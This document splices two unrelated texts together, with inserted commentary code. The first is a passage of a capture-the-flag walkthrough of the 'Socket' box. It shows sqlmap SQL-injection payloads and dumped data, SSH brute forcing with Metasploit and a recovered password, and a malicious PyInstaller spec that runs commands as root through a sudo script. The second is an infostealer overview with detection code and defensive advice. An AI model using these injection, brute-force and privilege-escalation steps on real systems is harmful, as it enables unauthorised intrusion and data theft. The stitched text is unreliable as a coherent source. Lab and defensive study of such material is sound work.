    Payload: version=0.0.2" AND 6925=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- MMbe

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: version=0.0.2" UNION ALL SELECT CHAR(113,98,98,106,113)||CHAR(97,100,107,108,90,74,75,68,112,104,76,90,84,85,119,84,117,117,89,109,103,112,74,72,116,88,74,72,72,80,99,122,110,107,67,122,122,72,115,81)||CHAR(113,98,113,98,113),NULL,NULL,NULL-- VJHs
---
[23:12:57] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:12:57] [INFO] fetching columns for table 'answers' 
[23:12:57] [INFO] fetching entries for table 'answers'
[23:12:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'    
[23:12:59] [INFO] fetching number of entries for table 'answers' in database 'SQLite_masterdb'
[23:12:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:12:59] [INFO] retrieved: 2
[23:13:02] [INFO] retrieved: 
[23:13:03] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                      
[23:13:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[23:13:08] [INFO] retrieved: Hello Json,  As if now we support PNG formart only. We will be adding JPEG/SVG file formats in our next version.  Thomas Keller
[23:18:12] [INFO] retrieved: admin
[23:18:24] [INFO] retrieved: 17/08/2022
[23:18:50] [INFO] retrieved: 1
[23:18:54] [INFO] retrieved: 
[23:18:55] [INFO] retrieved: 
[23:18:56] [INFO] retrieved: PENDING
[23:19:14] [INFO] retrieved: 
[23:19:15] [INFO] retrieved: 
[23:19:16] [INFO] retrieved: Hello Mike,   We have confirmed a valid problem with handling non-ascii charaters. So we suggest you to stick with ascci printable characters for now!  Thomas Keller
[23:25:36] [INFO] retrieved: admin
[23:25:48] [INFO] retrieved: 25/09/2022
[23:26:14] [INFO] retrieved: 2
[23:26:17] [INFO] retrieved: 
[23:26:18] [INFO] retrieved: 
[23:26:19] [INFO] retrieved: PENDING
Database: <current>
Table: answers
[2 entries]
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+
| id | report_id | answer                                                                                                                                                                        | status  | FOREIGN | answered_by | answered_date |
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+
| 1  | <blank>   | Hello Json,\n\nAs if now we support PNG formart only. We will be adding JPEG/SVG file formats in our next version.\n\nThomas Keller                                       | PENDING | <blank> | admin       | 17/08/2022    |
| 2  | <blank>   | Hello Mike,\n\n We have confirmed a valid problem with handling non-ascii charaters. So we suggest you to stick with ascci printable characters for now!\n\nThomas Keller | PENDING | <blank> | admin       | 25/09/2022    |
+----+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------+---------+-------------+---------------+

[23:26:37] [INFO] table 'SQLite_masterdb.answers' dumped to CSV file '/home/in7rud3r/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/answers.csv'                                                                                                               
[23:26:37] [INFO] fetched data logged to text files under '/home/in7rud3r/.local/share/sqlmap/output/localhost'
[23:26:37] [WARNING] your sqlmap version is outdated

[*] ending @ 23:26:37 /2023-06-28/

It seems the DB collects user reports and lets support staff keep track of the answers given to the requests received. Interestingly, the answers are signed by a Thomas Keller, who replied as admin. The idea is to generate a list of candidate accounts from the possible combinations of this user’s first and last name; I just need a suitable tool to build the dictionary to brute-force with.

GitHub – jseidl/usernamer: Pentest Tool to generate usernames/logins based on supplied names.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.206 - Socket (lin)/attack/git/usernamer]
└─$ python2 usernamer.py -n "Thomas Keller" -l > accountlistgenerated.txt
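What usernamer does, as an added stand-alone example (not the tool’s own code): build the usual login patterns from a first and last name, deduplicated and lowercased, ready to redirect into a wordlist. The only assumption is the set of separators worth trying.

```python
def generate_usernames(full_name, separators=("", ".", "_", "-")):
    """Candidate logins for one person, e.g. 'Thomas Keller' -> tkeller, thomas.keller, kellert, ...

    Order is deterministic (most common patterns first) and duplicates are removed.
    """
    # Keep only letters/digits so "O'Brien" or "Smith-Jones" still yield usable tokens.
    parts = ["".join(ch for ch in p if ch.isalnum()) for p in full_name.lower().split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        raise ValueError("need at least a first and a last name")
    first, last = parts[0], parts[-1]
    fi, li = first[0], last[0]

    # (left, right) combinations; the separator goes between them.
    pairs = [
        (fi, last),       # tkeller
        (first, last),    # thomaskeller, thomas.keller, ...
        (last, fi),       # kellert
        (first, li),      # thomask
        (last, first),    # kellerthomas
        (li, first),      # kthomas
    ]
    candidates = [first, last, fi + li, li + fi]
    for left, right in pairs:
        for sep in separators:
            candidates.append(left + sep + right)

    seen, out = set(), []
    for name in candidates:
        if name not in seen:
            seen.add(name)
            out.append(name)
    return out


if __name__ == "__main__":
    import sys
    # python3 usernames.py "Thomas Keller" > accountlistgenerated.txt
    print("\n".join(generate_usernames(" ".join(sys.argv[1:]) or "Thomas Keller")))
```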

And now, let’s start to brute force using metasploit.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/_10.10.11.206 - Socket (lin)/attack/git/usernamer]
└─$ msfconsole                        
[...]
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, use
                                                r&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                                ing-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.11.206
rhosts => 10.10.11.206
msf6 auxiliary(scanner/ssh/ssh_login) > set password denjanjade122566
password => denjanjade122566
msf6 auxiliary(scanner/ssh/ssh_login) > set stop_on_success true
stop_on_success => true
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file ./accountlistgenerated.txt
user_file => ./accountlistgenerated.txt
msf6 auxiliary(scanner/ssh/ssh_login) > exploit 

[*] 10.10.11.206:22 - Starting bruteforce
[+] 10.10.11.206:22 - Success: 'tkeller:denjanjade122566' 'uid=1001(tkeller) gid=1001(tkeller) groups=1001(tkeller),1002(shared) Linux socket 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (10.10.14.205:42467 -> 10.10.11.206:22) at 2023-06-29 00:07:56 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Et voilà… the first flag.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ ssh tkeller@10.10.11.206 
tkeller@10.10.11.206's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-67-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun 29 07:55:10 AM UTC 2023

  System load:           0.0
  Usage of /:            54.3% of 8.51GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             222
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.206
  IPv6 address for eth0: dead:beef::250:56ff:feb9:898d


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

tkeller@socket:~$ cat user.txt 
7******************************6

For the clue to the privesc, we don’t have to go too far either.

tkeller@socket:~$ sudo -l
Matching Defaults entries for tkeller on socket:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User tkeller may run the following commands on socket:
    (ALL : ALL) NOPASSWD: /usr/local/sbin/build-installer.sh
tkeller@socket:~$ cat /usr/local/sbin/build-installer.sh
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
  /usr/bin/echo "No enough arguments supplied"
  exit 1;
fi

action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')

if [[ -L $name ]];then
  /usr/bin/echo 'Symlinks are not allowed'
  exit 1;
fi

if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'make' ]]; then
  if [[ $ext == 'py' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
   /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'cleanup' ]]; then
  /usr/bin/rm -r ./build ./dist 2>/dev/null
  /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
  /usr/bin/rm /tmp/qreader* 2>/dev/null
else
  /usr/bin/echo 'Invalid action'
  exit 1;
fi

So, let’s analyze the script. It accepts two parameters, or a single one provided that it is the word “cleanup”. The second parameter is passed to awk, which splits it on the dot (.) and keeps the last field, i.e. the file extension. A quick check then rejects symlinks (they want to make things difficult for us). From there the only actions the script accepts are build, make and cleanup. The last one simply deletes some folders, so let’s look at build and make in detail. This is where the extension extracted from the second parameter, which turns out to be a file name, matters: if it is “spec” for the build action, or “py” for the make action, the script continues; otherwise it stops with an error message. In both cases the “pyinstaller” command is run (it packages a Python program into a standalone executable), and the resulting “build” and “dist” folders are then moved into /opt/shared. Remember that the whole script runs under sudo, so pyinstaller runs as root. So there are two possible attack points: the “awk” command and the “pyinstaller” command. Let’s see what we can do. My first approach is awk, which I’ve already seen on the GTFOBins portal.

awk | GTFOBins

As much as I turn it around, I can’t find anything that can be exploited in this specific scenario. Let’s move on to the “pyinstaller” command. I remember something about it, especially about the file used in the build, i.e. the .spec file, but I need to refresh my memory.

Using Spec Files — PyInstaller 5.13.0 documentation

OK. Clear, but I don’t have enough experience with this type of script to prepare a valid payload… let’s see if chatGPT can help me!

Meanwhile, a trivial Python script that does nothing useful; it only exists as something for the build to consume.

def sum(a, b):
    return a + b

num1 = float(input("Insert first number: "))
num2 = float(input("Insert second number: "))

result = sum(num1, num2)
print("Result is:", result)

And the malicious spec file, which captures the root flag while pyinstaller is merely reading it:

# script.spec: a PyInstaller spec file is ordinary Python, so everything in it
# runs with the privileges of whoever invokes pyinstaller (here root, via sudo).
import subprocess

def run_command(command):
    process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, error = process.communicate()
    return output.decode().strip()

# Executed while the spec is evaluated, before any real build work starts.
run_output = run_command("cat /root/root.txt")
print("Output del comando: ", run_output)

# The minimal build description that keeps pyinstaller happy afterwards.
a = Analysis(['script.py'],
             pathex=['path_del_file'],
             binaries=[],
             datas=[],
             )

And we execute the attack with root privileges.

tkeller@socket:~/tmp$ sudo /usr/local/sbin/build-installer.sh build script.spec 
124 INFO: PyInstaller: 5.6.2
124 INFO: Python: 3.10.6
127 INFO: Platform: Linux-5.15.0-67-generic-x86_64-with-glibc2.35
132 INFO: UPX is not available.
Output del comando:  7******************************d
136 INFO: Extending PYTHONPATH with paths
['/home/tkeller/tmp', '/home/tkeller/tmp/path_del_file']
451 INFO: checking Analysis
451 INFO: Building Analysis because Analysis-00.toc is non existent
451 INFO: Initializing module dependency graph...
453 INFO: Caching module graph hooks...
458 WARNING: Several hooks defined for module 'numpy'. Please take care they do not conflict.
461 INFO: Analyzing base_library.zip ...
1292 INFO: Loading module hook 'hook-heapq.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
1381 INFO: Loading module hook 'hook-encodings.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
2886 INFO: Loading module hook 'hook-pickle.py' from '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks'...
4217 INFO: Caching module dependency graph...
4329 INFO: running Analysis Analysis-00.toc
4362 INFO: Analyzing /home/tkeller/tmp/script.py
4363 INFO: Processing module hooks...
4373 INFO: Looking for ctypes DLLs
4376 INFO: Analyzing run-time hooks ...
4378 INFO: Including run-time hook '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks/rthooks/pyi_rth_inspect.py'
4380 INFO: Including run-time hook '/root/.local/lib/python3.10/site-packages/PyInstaller/hooks/rthooks/pyi_rth_subprocess.py'
4384 INFO: Looking for dynamic libraries
4899 INFO: Looking for eggs
4899 INFO: Python library not in binary dependencies. Doing additional searching...
4920 INFO: Using Python library /lib/x86_64-linux-gnu/libpython3.10.so.1.0
4922 INFO: Warnings written to /home/tkeller/tmp/build/script/warn-script.txt
4939 INFO: Graph cross-reference written to /home/tkeller/tmp/build/script/xref-script.html

Wooo. Amazing. Quite a piece of cake! Well, that’s all, folks. I’ll meet you at the next BOX. Have a nice hacking! Bye!
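The root cause above is that build-installer.sh hands a user-controlled .spec file, which pyinstaller executes as ordinary Python, to a process running as root. As an added defender-side example (not code from the write-up or from PyInstaller), here is a pre-build audit that rejects any spec that is more than a build description; the allow-list of build-API names and the two sample specs are my assumptions, and it is a guardrail only, not a substitute for running the build as an unprivileged account instead of via NOPASSWD sudo.

```python
import ast

# Calls a plain spec legitimately makes: the PyInstaller build API objects that
# pyinstaller injects into the spec's namespace (assumed allow-list).
ALLOWED_CALLS = {"Analysis", "PYZ", "EXE", "COLLECT", "BUNDLE", "MERGE", "Tree", "TOC", "Splash"}

# Statement kinds a build description consists of, e.g. `a = Analysis(...)`.
ALLOWED_STATEMENTS = (ast.Assign, ast.AnnAssign, ast.Expr)


def audit_spec(source: str) -> list[str]:
    """Return a list of findings; an empty list means the spec is only a build description."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"line {exc.lineno}: not valid Python ({exc.msg})"]

    findings: list[str] = []
    for stmt in tree.body:
        # def/class, loops, with/try and friends have no place in a spec.
        # Imports are reported by the walk below instead.
        if not isinstance(stmt, ALLOWED_STATEMENTS + (ast.Import, ast.ImportFrom)):
            findings.append(f"line {stmt.lineno}: {type(stmt).__name__} statement is not a build description")

    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"line {node.lineno}: import statement")
        elif isinstance(node, ast.Call):
            # Any call other than the build API (print, open, exec, __import__,
            # subprocess.*, os.*, dunder tricks) is reported by its source text.
            func = node.func
            if isinstance(func, ast.Name) and func.id in ALLOWED_CALLS:
                continue
            findings.append(f"line {node.lineno}: call to {ast.unparse(func)}()")
    return findings


def is_plain_spec(source: str) -> bool:
    """Convenience wrapper: True only when audit_spec() finds nothing."""
    return not audit_spec(source)


# Constructed samples: a normal one-file spec, and one shaped like the payload
# in the walkthrough (code that runs while the spec is merely being read).
BENIGN_SPEC = """\
block_cipher = None

a = Analysis(['script.py'], pathex=[], binaries=[], datas=[])
pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)
exe = EXE(pyz, a.scripts, name='script', console=True)
"""

HOSTILE_SPEC = """\
import subprocess

def run_command(command):
    return subprocess.run(command, capture_output=True).stdout

print(run_command(["id"]))
a = Analysis(['script.py'], pathex=[], binaries=[], datas=[])
"""

if __name__ == "__main__":
    for label, spec in (("benign", BENIGN_SPEC), ("hostile", HOSTILE_SPEC)):
        print(label, "->", audit_spec(spec) or "no findings")
```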

Secjuice – ​Read More

Infostealers: An Overview

What are Infostealers?


An infostealer is malicious software designed to infiltrate computer systems and extract valuable information from compromised devices. These malware programs operate covertly (unlike some malware that throws up pop-ups or noticeably hampers system performance) to collect sensitive data.

For a shorter description, an infostealer is malware that covertly steals secret information from a computer.

Our computers have tons of sensitive information tucked away – passwords in the browser, cookies with connection tokens, files with sensitive information saved (how many people do you think have a text file saved with a name like “passwords” or “private”?), PDFs with their recovery key codes, Word documents with their banking information – to name a few.

And in every operating system, there are typical “hidden” places with loads of information about that computer (e.g., Windows registry, Linux /etc, /usr, /bin).

Those are the items that infostealers are after.

Typical Techniques

Infostealers use varied techniques for system infiltration and data extraction. These techniques include but aren’t limited to phishing, infected websites, malicious software downloads (e.g., video game mods, pirated software), and exploiting system vulns.

Once installed, infostealers harvest data via methods like browser hooking, web injection scripts, form grabbing, keylogging, clipboard hijacking, screen capturing (ironically, this sounds like Microsoft’s recent Recall feature), and browser session hijacking.

Some more specific information

After infecting a computer, infostealers use techniques such as the following (but not limited to these) to acquire data:

  1. Credentials: Credentials are a significant target, providing the quickest and easiest way for the criminal element to access computers. Stolen credential data includes login links, usernames, and even passwords stored in the browser.
  2. Cookies: Cookies enable malicious actors to access a logged-in session, bypassing security measures like MFA/2FA.
  3. Documents and text files: Infostealers discover and target high-risk files containing confidential information such as financial data, intellectual property, server passwords, and crypto private keys.
  4. Machine-specific properties: These properties include computer name, operating system, IP address, date and pathway of infection, as well as existing antivirus and installed applications. It’s their way of doing recon!

Anatomy of an Infostealer

Bot Framework

The bot framework is an essential component of many infostealers, designed to operate on many victim machines for infection distribution. Here are key aspects of the Bot Framework:

  1. Configurability: The framework includes a builder allowing attackers to customize the infostealer’s behavior on the target computer. This enables them to specify the data to collect and how the malware should operate.
  2. Data collection capabilities: Bot frameworks typically include modules for:
     - Harvesting browser data (passwords, cookies, autofill information)
     - Extracting credentials from various applications
     - Capturing keystrokes
     - Taking screenshots
     - Gathering system information
  3. Stealth: Infostealers are designed to be lightweight and stealthy, leaving a minimal footprint on the infected system.
  4. Exfiltration: The bot framework is responsible for sending the collected data back to the attacker’s command and control (C2) server.
  5. Versioning: Some sophisticated bot frameworks, like the one used in the Jupyter infostealer, implement a versioning matrix to manage different malware versions.
  6. More advanced bot frameworks may include capabilities for:
     - Downloading and executing additional malware
     - Running PowerShell scripts and commands
     - Process hollowing (for injecting malicious code into apps)
  7. Compatibility: Bot frameworks are often designed to work across multiple Windows versions and system architectures. For example, the Continental Stealer is compatible with systems from Windows 7 (x32) to Windows 11 (x64) and supports both ARM and x86-x64 architectures.
  8. Anti-detection features: Some bot frameworks incorporate anti-VM capabilities to evade detection when running in virtual environments and self-destruct mechanisms to remove traces after execution.

Here’s a pictorial and general overview of a bot framework: 


And of the attack lifecycle:

All in the Family

Infostealers are technically malware, which we often think of as a product, like buying an office suite or a photo-editing program; more precisely, it is Malware-as-a-Service (MaaS), because one can pay a vendor $130-$750 for the Vidar infostealer, for example, depending on the license. But a given stealer is also often referred to as if it were its own entity: a family, distributor, reseller, market, campaign, or threat actor. Here, I’ll talk about infostealers in both ways, without dwelling on whether “it” is the malware or the threat actor.

Some of the most prevalent infostealer families include Raccoon, RedLine, AgentTesla, Vidar, and AZOrult.

One example of the sophistication of MaaS is the stealer Rhadamanthys (here’s a quick overview of it, with YARA rules at the bottom of the page if you need them to search for activity).

Rhadamanthys has instructional videos on Vimeo about how to use it. 


The Top 3?

What are the main ones to be aware of and protect against? There’s no way to determine “Who’s or what’s the most dangerous?” It’s like asking, “What’s the best band?” or “What’s the worst company?” There are so many technical details and subjective experiences that calling something “worst” or “best” is not quantifiable. For infostealers, some are spun up and then dismantled, others are used prominently for a while and then placed in the malware junk drawer; some are for mobile, some for specific industries, and others are OS-specific.

But to focus a little, 3 of the top infostealers are:

  1. Raccoon
  2. Redline
  3. Vidar

Raccoon

Raccoon Infostealer, first observed in April 2019, is a popular and effective Malware-as-a-Service (MaaS). Raccoon targets a wide range of sensitive information – such as login credentials, credit card details, cookies, browser history, and autofill information. Written in C++, Raccoon employs a modular approach to infect both 32-bit and 64-bit Windows-based systems, using process injection techniques to hijack legitimate processes like explorer.exe and gain elevated privileges.

What makes Raccoon particularly dangerous is its comprehensive data collection capabilities. The malware gathers detailed system information, including operating system architecture, version, system language, hardware details, and installed applications. It can also capture screenshots if enabled by the attacker’s configuration. Raccoon follows a standard procedure for each targeted application: locating and copying cache files containing sensitive data, extracting and encrypting the information, and storing it in its main operating directory. After collecting data, Raccoon compresses all stolen information into a single zip file and exfiltrates it to its command-and-control (C2) server, typically using Telegraph or Discord for C2 operations.

Monitoring for Raccoon Stealer

To identify and mitigate the threat of Raccoon Infostealer, several indicators and behaviors can be monitored:

Raccoon Stealer v2 infections are characterized by unusual HTTP requests with empty Host headers and abnormal User Agent headers. The malware frequently changes its User Agent strings to evade detection, making anomaly-based detection methods crucial.

The malware contacts its command-and-control (C2) server using HTTP GET and POST requests, often to highly unusual IP addresses. These requests can include downloading DLL libraries and exfiltrating stolen data.

Upon infection, Raccoon Stealer fingerprints the target system, gathering information such as the operating system architecture, version, system language, hardware details, and installed applications. It uses functions like `RegQueryValueExW` and `GetUserNameW` to retrieve machine IDs and usernames.

The malware collects sensitive data, including browser autofill passwords, history, cookies, credit card details, usernames, passwords, and data from cryptocurrency wallets. It then compresses this data into a zip file (often named `Log.zip`) and sends it to the C2 server via an HTTP POST request.

Raccoon Stealer uses process injection techniques to hijack legitimate processes like `explorer.exe` and gain elevated privileges.
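To make the Raccoon v2 network traits above concrete, here is an added example (not from the article or any vendor tool) that runs simple triage rules over a constructed tab-separated proxy log: an empty Host header, requests straight to a bare IP address, a large POST to such a host, and User-Agent churn from a single client. The log format, the 192.0.2.10 address and the two thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in an assumed tab-separated proxy log format: time,
# client IP, method, URL, Host header as sent ("-" if absent), User-Agent,
# request body size in bytes.  10.0.0.7 is ordinary browsing; 10.0.0.23 shows
# the traits from the text.  192.0.2.10 is a documentation address standing in
# for an attacker-controlled host.
SAMPLE_LOG = """\
2024-12-28T09:00:01Z\t10.0.0.7\tGET\thttps://www.example.com/\twww.example.com\tMozilla/5.0 (Windows NT 10.0) Chrome/120.0\t0
2024-12-28T09:00:05Z\t10.0.0.7\tPOST\thttps://www.example.com/login\twww.example.com\tMozilla/5.0 (Windows NT 10.0) Chrome/120.0\t312
2024-12-28T09:01:10Z\t10.0.0.23\tGET\thttp://192.0.2.10/\t-\tagent-a\t0
2024-12-28T09:01:12Z\t10.0.0.23\tGET\thttp://192.0.2.10/lib.dll\t-\tagent-b\t0
2024-12-28T09:01:40Z\t10.0.0.23\tPOST\thttp://192.0.2.10/\t192.0.2.10\tMozilla/5.0 (compatible)\t734003
"""

POST_BYTES_THRESHOLD = 100_000  # assumption: a stolen-data archive is far larger than a form post
UA_CHURN_THRESHOLD = 3          # assumption: distinct User-Agents from one client before flagging


def parse_log(text: str) -> list[dict]:
    """Split the constructed log format into one dict per request."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, host, ua, body = line.split("\t")
        rows.append({"ts": ts, "src": src, "method": method, "url": url,
                     "host": host, "ua": ua, "body": int(body)})
    return rows


def is_ip_literal(hostname: str) -> bool:
    """True when the URL's host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(hostname)
    except ValueError:
        return False
    return True


def triage(rows: list[dict]) -> dict[str, list[str]]:
    """Map each client IP to the suspicious traits seen in its requests."""
    findings: dict[str, list[str]] = defaultdict(list)
    agents: dict[str, set[str]] = defaultdict(set)
    for r in rows:
        target = urlsplit(r["url"]).hostname or ""
        agents[r["src"]].add(r["ua"])
        if r["host"] in ("", "-"):
            findings[r["src"]].append(f'{r["ts"]} empty Host header on request to {target}')
        if is_ip_literal(target):
            findings[r["src"]].append(f'{r["ts"]} {r["method"]} straight to IP {target}')
            if r["method"] == "POST" and r["body"] >= POST_BYTES_THRESHOLD:
                findings[r["src"]].append(
                    f'{r["ts"]} {r["body"]}-byte POST to {target}: possible archive exfiltration')
    # A client cycling through several User-Agents is the churn the text describes.
    for src, uas in agents.items():
        if len(uas) >= UA_CHURN_THRESHOLD:
            findings[src].append(f"{len(uas)} distinct User-Agents from one client: UA churn")
    return dict(findings)


if __name__ == "__main__":
    for src, hits in triage(parse_log(SAMPLE_LOG)).items():
        print(src)
        for hit in hits:
            print("  -", hit)
```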

Raccoon Stealer was hampered in 2022 with the arrest of one of its main developers, who then pleaded guilty in 2024. But it’s still active.

Redline

RedLine Stealer, first discovered in 2020, has become one of the most notorious and widely used information-stealing malware in recent years. Operating on a Malware-as-a-Service (MaaS) model, RedLine allows cybercriminals to purchase a turnkey solution for stealing sensitive data from infected systems. This infostealer is capable of harvesting a wide range of information, including saved credentials, autocomplete data, and credit card details from web browsers, as well as data from cryptocurrency wallets, FTP clients, and popular messaging applications like Discord and Telegram.

What makes RedLine particularly dangerous is its ability to gather detailed system information, such as the victim’s IP address, operating system details, installed antivirus software, and hardware configuration. This comprehensive data collection allows attackers to build detailed profiles of their victims and potentially use the stolen information for further malicious activities, including identity theft, financial fraud, or as a stepping stone for more sophisticated attacks like ransomware. The effectiveness and relatively low cost of RedLine have contributed to its popularity among cybercriminals, making it a significant threat in the current cybersecurity landscape.

Redline TTPs

More details on these TTPs can be found at Infostealers.com https://www.infostealers.com/technique/redline-stealer/

T1087, T1071, T1020, T1059, T1555.003, T1132, T1005, T1140, T1573, T1041, T1083, T1562, T1105, T1056, T1095, T1571, T1003, T1120, T1566, T1057, T1055, T1012, T1113, T1518, T1528, T1539, T1082, T1614, T1007, T1124, T1552, T1204

Vidar

First noticed in 2018, Vidar infostealer is a versatile malware that gained prominence in the cybercriminal ecosystem due to its efficiency in harvesting sensitive data. Initially marketed on underground forums as a Malware-as-a-Service (MaaS), Vidar is favored for its ease of use and ability to target a wide range of information, including login credentials, financial data, cryptocurrency wallets, and autofill information from browsers. The malware typically spreads through phishing campaigns, malicious advertising, or exploit kits, making it a persistent threat across multiple industries. Once deployed, Vidar operates silently, exfiltrating data to its command-and-control (C2) server while leaving minimal traces on the infected system.

One of Vidar’s most troublesome attributes is its modular architecture, allowing customization of its functionality. This adaptability lets threat actors use Vidar for reconnaissance, credential theft, or even as a precursor to more devastating attacks like ransomware. The malware is also equipped with anti-analysis techniques, such as virtual machine detection and sandbox evasion, making it challenging for security researchers to dissect its operations. Over time, Vidar has been associated with various campaigns targeting organizations globally, highlighting the growing need for robust endpoint protection, phishing awareness training, and network monitoring to counteract its impact.

Related to Arkei trojan, Vidar can even receive updates!

For additional information, here’s an interview between g0njxa and Vidar staff: https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-vidar-2c0a62a73087

For those looking to protect their network, here are some defanged IoCs (Indicators of Compromise) – IP Addresses, Domains, and Social Media. Plus some MITRE ATT&CK TTPs. This is just a sampling; much more can be found in the links in this section and the Resources at the end.


Vidar Malware MITRE ATT&CK Tactics, Techniques, & Procedures (TTPs)

Technique ID – Description
T1204 – User Execution
T1555 – Credentials from Password Stores
T1539 – Steal Web Session Cookie
T1614 – System Location Discovery
T1518 – Software Discovery
T1007 – System Service Discovery
T1095 – Non-Application Layer Protocol
T1566 – Phishing
T1552 – Unsecured Credentials
T1113 – Screen Capture
T1057 – Process Discovery
T1087 – Account Discovery
T1041 – Exfiltration Over C&C Channel

Protection

It’s never good to present all the things to be afraid of yet not show people how to protect against those fearful apparitions.

There’s a lot of information to sift through. How can we protect ourselves against all of these malicious actors? No report can provide all the ways – too many factors, and many are highly technical. But here are several ways that anybody can use, professional/technical or not.

  1. Multi-Factor Authentication (MFA/2FA): For infostealers, user credentials are a major target. Deploying MFA makes it more difficult for an attacker to use the stolen credentials.
  2. Use strong anti-malware software
     a. New to buying antimalware/antivirus? Search online for top antimalware or best antivirus suites or top 10 AV for 2025.
  3. Keep systems and software up-to-date
     a. For home use and personal devices, select automatic download and then install when ready.
     b. For corporate users, automatic updates can cause big trouble for critical systems, so ensure proper testing, but update (or upgrade) when you can. I know…easier said than done.
  4. Use caution with attachments and downloads
     a. If you can slow down to think about what you’re sending or downloading, that’s a great start.
     b. Because many infostealer campaigns deliver malicious files via a phishing email, it’s great to have security solutions that can inspect email attachments for malicious content and provide the ability to rip them out before people can get to them.
  5. Implement strong password policies
     a. Typical home use of computers doesn’t require official policies, but at least keep in mind that the better your password, the better.
  6. Regularly monitor for suspicious activities
     a. Don’t click on those pop-ups on your computer, except to click on the X or Close. Even at that, those are simply buttons that could be tied to actions. So, if at all possible, close the entire browser (or at least the tab) instead of clicking on the pop-up.
     b. Set a regular time to review your bank transactions. That doesn’t prevent crime, but at least a long time won’t pass without you knowing about it.
  7. Educate colleagues about social engineering
     a. Professionals: help people out. Non-professionals: ask for help. Security professionals love to help people (we might not fix things or give hour-long seminars for free, but an email now and then is possible).

